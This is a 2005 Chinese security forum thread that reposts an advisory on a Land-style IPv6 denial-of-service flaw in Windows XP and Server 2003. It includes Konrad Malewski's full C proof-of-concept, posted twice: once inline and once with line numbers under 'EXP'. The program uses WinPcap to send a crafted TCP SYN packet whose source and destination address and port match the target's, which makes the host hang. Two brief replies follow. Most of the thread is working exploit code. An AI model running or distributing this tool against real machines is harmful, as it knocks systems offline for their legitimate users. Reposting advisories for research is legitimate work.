返回列表 发帖
千與千尋 该用户已被删除
楼主 跳转到 » 正序看帖
打印
tT
千與千尋发表于 2005-5-23 00:04 | 只看该作者

Microsoft Windows XP/2k3/Longhorn IPv6易受Land攻击影响漏洞

发布日期:2005-05-18 更新日期:2005-05-18 受影响系统: Microsoft Windows Server 2003 Microsoft Windows XP SP2 Microsoft Windows XP SP1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 13658 Microsoft Windows XP/2k3/Longhorn都是微软发布的非常流行的操作系统。 Microsoft Windows IPv6 TCP/IP协议栈存在loopback情况,攻击者可以发送源端口、目标端口都设置为相同的特制TCP报文导致死循环,造成合法用户的拒绝服务。 最近的安全更新修复了IPv4协议中的漏洞,但没有修复IPv6协议中的漏洞。 <*来源:Konrad Malewski (koyot@moon.ondraszek.ds.polsl.gliwice.pl) 链接:http://archives.neohapsis.com/archives/today/0010.html *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! // // Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135 // // Written by: Konrad Malewski. // #include #include #include #include #include #include /////////////////////////////////////////////////////////////////////////////// ///////////// from libnet ///////////// /* ethernet addresses are 6 octets long */ #define ETHER_ADDR_LEN 0x6 typedef unsigned char u_int8_t; typedef unsigned short u_int16_t; typedef unsigned int u_int32_t; typedef unsigned __int64 u_int64_t; /* * Ethernet II header * Static header size: 14 bytes */ struct libnet_ethernet_hdr { u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */ u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */ u_int16_t ether_type; /* protocol */ }; struct libnet_in6_addr { union { u_int8_t __u6_addr8[16]; u_int16_t __u6_addr16[8]; u_int32_t __u6_addr32[4]; } __u6_addr; /* 128-bit IP6 address */ }; /* * IPv6 header * Internet Protocol, version 6 * Static header size: 40 bytes */ struct libnet_ipv6_hdr { u_int8_t ip_flags[4]; /* version, traffic class, flow label */ u_int16_t ip_len; /* total length */ u_int8_t ip_nh; /* next header */ u_int8_t ip_hl; /* hop limit */ struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */ }; /* * TCP header * Transmission Control Protocol * Static header size: 20 bytes */ struct libnet_tcp_hdr { u_int16_t th_sport; /* source port */ u_int16_t th_dport; /* destination port */ u_int32_t th_seq; /* sequence number */ u_int32_t th_ack; /* acknowledgement number */ u_int8_t th_x2:4, /* (unused) */ th_off:4; /* data offset */ u_int8_t th_flags; /* control flags */ u_int16_t th_win; /* window */ u_int16_t th_sum; /* checksum */ u_int16_t th_urp; /* urgent pointer */ }; int libnet_in_cksum(u_int16_t *addr, int len) { int sum; union { u_int16_t s; u_int8_t b[2]; }pad; sum = 0; while (len > 1) { sum += *addr++; len -= 2; } if (len == 1) { pad.b[0] = *(u_int8_t *)addr; pad.b[1] = 0; sum += pad.s; } return (sum); } #define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff)) /////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// u_char packet[74]; struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14); struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54); struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet; u_char errbuf[1024]; pcap_t *pcap_handle; void usage(char* n) { pcap_if_t * alldevs,*d; int i=1; fprintf(stdout,"Usage:\n" "\t %s \n",n); if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1) { fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf); exit(EXIT_FAILURE); } printf("Avaliable adapters: \n"); d = alldevs; while (d!=NULL) { printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description); d = d->next; } pcap_freealldevs (alldevs); } /////////////////////////////////////////////////////////////////////////////// int main(int argc, char* argv[]) { if ( argc<4 ) { usage(argv[0]); return EXIT_FAILURE; } int retVal; struct addrinfo hints,*addrinfo; ZeroMemory(&hints,sizeof(hints)); WSADATA wsaData; if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR ) { fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError()); return EXIT_FAILURE; } // // Get MAC address of remote host (assume link local IpV6 address) // hints.ai_family = PF_INET6; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; hints.ai_flags = AI_PASSIVE; retVal = getaddrinfo(argv[2],0, &hints, &addrinfo); if ( retVal!=0 ) { WSACleanup(); fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError()); exit(EXIT_FAILURE); } // // Open WinPCap adapter // if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL ) { freeaddrinfo(addrinfo); WSACleanup(); fprintf(stderr, "Error opening device: %s\n",argv[1]); return EXIT_FAILURE; } ZeroMemory(packet,sizeof(packet)); struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr; // fill ethernet header eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something; eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9]; eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10]; eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13]; eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14]; eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15]; eth_hdr->ether_type = 0xdd86; // fill IP header // source ip == destination ip memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); ip6_hdr->ip_hl = 255; ip6_hdr->ip_nh = IPPROTO_TCP; ip6_hdr->ip_len = htons (20); ip6_hdr->ip_flags[0] = 0x06 << 4; srand((unsigned int) time(0)); // fill tcp header tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source port equal to destination tcp_hdr->th_seq = rand(); tcp_hdr->th_ack = rand(); tcp_hdr->th_off = htons(5); tcp_hdr->th_win = rand(); tcp_hdr->th_sum = 0; tcp_hdr->th_urp = htons(10); tcp_hdr->th_off = 5; tcp_hdr->th_flags = 2; // calculate tcp checksum int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32); chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr)); chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr)); tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum); // send data to wire retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet)); if ( retVal == -1 ) { fprintf(stderr,"Error writing packet to wire!!\n"); } // // close adapter, free mem.. etc.. // pcap_close(pcap_handle); freeaddrinfo(addrinfo); WSACleanup(); return EXIT_SUCCESS; } 建议: -------------------------------------------------------------------------------- 厂商补丁: Microsoft --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.microsoft.com/technet/security/
收藏 分享

x86 该用户已被删除
地板
x86发表于 2005-5-24 23:59 | 只看该作者

Microsoft Windows XP/2k3/Longhorn IPv6易受Land攻击影响漏洞

看看...

TOP

主题
积分
贝壳
0 个 
注册时间
2006-11-29 
最后登录
2006-11-29 
板凳
chinanic发表于 2005-5-23 04:50 | 只看该作者

Microsoft Windows XP/2k3/Longhorn IPv6易受Land攻击影响漏洞

呵呵,我是菜鸟,看不懂,还是收藏起,哪天看得懂了再说,谢谢!

TOP

千與千尋 该用户已被删除
沙发
千與千尋发表于 2005-5-23 00:05 | 只看该作者

Microsoft Windows XP/2k3/Longhorn IPv6易受Land攻击影响漏洞

EXP
  1. //
  2. // Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D}
  3. //fe80::2a1:b0ff:fe08:8bcc 135
  4. //
  5. // Written by: Konrad Malewski.
  6. //
  7. &#35;include <stdlib.h>
  8. &#35;include <stdio.h>
  9. &#35;include <Winsock2.h>
  10. &#35;include <ws2tcpip.h>
  11. &#35;include <pcap.h>
  12. &#35;include <remote-ext.h>
  13. ///////////////////////////////////////////////////////////////////////////////
  14. ///////////// from libnet /////////////
  15. /* ethernet addresses are 6 octets long */
  16. &#35;define ETHER_ADDR_LEN 0x6
  17. typedef unsigned char u_int8_t;
  18. typedef unsigned short u_int16_t;
  19. typedef unsigned int u_int32_t;
  20. typedef unsigned __int64 u_int64_t;
  21. /*
  22. * Ethernet II header
  23. * Static header size: 14 bytes
  24. */
  25. struct libnet_ethernet_hdr
  26. {
  27. u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
  28. u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
  29. u_int16_t ether_type; /* protocol */
  30. };
  31. struct libnet_in6_addr
  32. {
  33. union
  34. {
  35. u_int8_t __u6_addr8[16];
  36. u_int16_t __u6_addr16[8];
  37. u_int32_t __u6_addr32[4];
  38. } __u6_addr; /* 128-bit IP6 address */
  39. };
  41. /*
  42. * IPv6 header
  43. * Internet Protocol, version 6
  44. * Static header size: 40 bytes
  45. */
  46. struct libnet_ipv6_hdr
  47. {
  48. u_int8_t ip_flags[4]; /* version, traffic class, flow label */
  49. u_int16_t ip_len; /* total length */
  50. u_int8_t ip_nh; /* next header */
  51. u_int8_t ip_hl; /* hop limit */
  52. struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */
  53. };
  54. /*
  55. * TCP header
  56. * Transmission Control Protocol
  57. * Static header size: 20 bytes
  58. */
  59. struct libnet_tcp_hdr
  60. {
  61. u_int16_t th_sport; /* source port */
  62. u_int16_t th_dport; /* destination port */
  63. u_int32_t th_seq; /* sequence number */
  64. u_int32_t th_ack; /* acknowledgement number */
  65. u_int8_t th_x2:4, /* (unused) */
  66. th_off:4; /* data offset */
  67. u_int8_t th_flags; /* control flags */
  68. u_int16_t th_win; /* window */
  69. u_int16_t th_sum; /* checksum */
  70. u_int16_t th_urp; /* urgent pointer */
  71. };
  72. int libnet_in_cksum(u_int16_t *addr, int len)
  73. {
  74. int sum;
  75. union
  76. {
  77. u_int16_t s;
  78. u_int8_t b[2];
  79. }pad;
  80. sum = 0;
  81. while (len > 1)
  82. {
  83. sum += *addr++;
  84. len -= 2;
  85. }
  86. if (len == 1)
  87. {
  88. pad.b[0] = *(u_int8_t *)addr;
  89. pad.b[1] = 0;
  90. sum += pad.s;
  91. }
  92. return (sum);
  93. }
  94. &#35;define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16))
  95. & 0xffff))
  96. ///////////////////////////////////////////////////////////////////////////////
  97. ///////////////////////////////////////////////////////////////////////////////
  98. u_char packet[74];
  99. struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
  100. struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
  101. struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;
  102. u_char errbuf[1024];
  103. pcap_t *pcap_handle;
  105. void usage(char* n)
  106. {
  107. pcap_if_t * alldevs,*d;
  108. int i=1;
  109. fprintf(stdout,"Usage:\n"
  110. "\t %s <device> <victim> <port>\n",n);
  111. if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
  112. {
  113. fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
  114. exit(EXIT_FAILURE);
  115. }
  116. printf("Avaliable adapters: \n");
  117. d = alldevs;
  118. while (d!=NULL)
  119. {
  120. printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
  121. d = d->next;
  122. }
  123. pcap_freealldevs (alldevs);
  124. }
  125. ///////////////////////////////////////////////////////////////////////////////
  126. int main(int argc, char* argv[])
  127. {
  128. if ( argc<4 )
  129. {
  130. usage(argv[0]);
  131. return EXIT_FAILURE;
  132. }
  133. int retVal;
  134. struct addrinfo hints,*addrinfo;
  135. ZeroMemory(&hints,sizeof(hints));
  136. WSADATA wsaData;
  137. if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
  138. {
  139. fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
  140. return EXIT_FAILURE;
  141. }
  142. //
  143. // Get MAC address of remote host (assume link local IpV6 address)
  144. //
  145. hints.ai_family = PF_INET6;
  146. hints.ai_socktype = SOCK_STREAM;
  147. hints.ai_protocol = IPPROTO_TCP;
  148. hints.ai_flags = AI_PASSIVE;
  149. retVal = getaddrinfo(argv[2],0, &hints, &addrinfo);
  150. if ( retVal!=0 )
  151. {
  152. WSACleanup();
  153. fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
  154. exit(EXIT_FAILURE);
  155. }
  156. //
  157. // Open WinPCap adapter
  158. //
  159. if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS,
  160. 100, (char*)errbuf)) == NULL )
  161. {
  162. freeaddrinfo(addrinfo);
  163. WSACleanup();
  164. fprintf(stderr, "Error opening device: %s\n",argv[1]);
  165. return EXIT_FAILURE;
  166. }
  167. ZeroMemory(packet,sizeof(packet));
  168. struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;
  169. // fill ethernet header
  170. eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like
  171. 00:something;
  172. eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
  173. eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
  174. eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
  175. eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
  176. eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
  177. eth_hdr->ether_type = 0xdd86;
  179. // fill IP header
  180. // source ip == destination ip
  181. memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
  182. memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
  183. ip6_hdr->ip_hl = 255;
  184. ip6_hdr->ip_nh = IPPROTO_TCP;
  185. ip6_hdr->ip_len = htons (20);
  186. ip6_hdr->ip_flags[0] = 0x06 << 4;
  187. srand((unsigned int) time(0));
  188. // fill tcp header
  189. tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source
  190. port equal to destination
  191. tcp_hdr->th_seq = rand();
  192. tcp_hdr->th_ack = rand();
  193. tcp_hdr->th_off = htons(5);
  194. tcp_hdr->th_win = rand();
  195. tcp_hdr->th_sum = 0;
  196. tcp_hdr->th_urp = htons(10);
  197. tcp_hdr->th_off = 5;
  198. tcp_hdr->th_flags = 2;
  199. // calculate tcp checksum
  200. int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
  201. chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
  202. chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct
  203. libnet_tcp_hdr));
  204. tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
  205. // send data to wire
  206. retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
  207. if ( retVal == -1 )
  208. {
  209. fprintf(stderr,"Error writing packet to wire!!\n");
  210. }
  211. //
  212. // close adapter, free mem.. etc..
  213. //
  214. pcap_close(pcap_handle);
  215. freeaddrinfo(addrinfo);
  216. WSACleanup();
  217. return EXIT_SUCCESS;
  218. }
复制代码

TOP

返回列表 回复 发帖